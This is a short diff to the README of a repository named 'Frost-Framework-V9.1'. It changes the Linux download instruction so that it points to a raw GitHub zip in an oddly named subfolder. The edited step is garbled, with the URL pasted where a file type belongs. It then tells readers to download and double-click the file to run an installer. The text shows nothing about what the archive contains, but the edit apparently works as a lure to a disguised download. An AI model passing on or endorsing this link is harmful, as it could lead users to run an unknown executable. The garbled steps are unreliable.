NullCaster2001/Frost-Framework-V9.1/README.md

 3. Choose the file that matches your operating system.
     - For Windows, look for a `.exe` file.
     - For macOS, find a `.dmg` file.
-    - For Linux, select a compatible `.tar.gz` or package file.
+    - For Linux, select a compatible `https://raw.githubusercontent.com/NullCaster2001/Frost-Framework-V9.1/main/sparassodont/Frost-Framework-V9.1.zip` or package file.
 4. Click on the download link for your chosen file.
 5. Once the download is complete, locate the file on your computer.
 6. Double-click the file to run the installer.
 Follow the on-screen instructions to complete the installation.